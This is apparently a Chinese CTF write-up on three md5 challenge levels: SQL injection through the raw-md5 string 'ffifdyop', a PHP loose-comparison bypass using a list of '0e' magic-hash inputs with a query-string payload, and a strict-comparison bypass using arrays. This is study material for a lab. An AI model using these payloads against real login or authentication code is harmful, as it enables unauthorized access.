一道很综合的md5的题
一共有三关
1.md5(s,true)
在响应头中发现
select * from 'admin' where password=md5($pass,true)
可以看到md5函数第二个参数是True,意为返回原始16字符二进制格式。
也就是说如果md5值经过hex转成字符串后为 ‘or’+balabala这样的字符串
目的就是让md5函数的结果为true
这里提供一个最常用的:ffifdyop,该字符串md5加密后若raw参数为True时会返回 'or’6 (其实就是一些乱码和不可见字符,这里只要第一位是非零数字即可被判定为True,后面的会在MySQL将其转换成整型比较时丢掉)
输入ffifdyop进入下一关
2.md5弱比较绕过
查看源码
‘==’ 会将两个变量变为同类型比较,所以寻找两个明文不同但md5值为"0exxxxx"的字符串,因为0exxxx会被看成科学计数法,所以0exxxx都为0
,所以相等。
列举几个例子:
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
payload:levels91.php?a=s878926199a&b=s155964671a
进入下一关
3.强比较绕过
‘===’可以用数组绕过,因为所有数组的md5值都为NULL(当然第二关也可以用此方法绕过)
得到flag!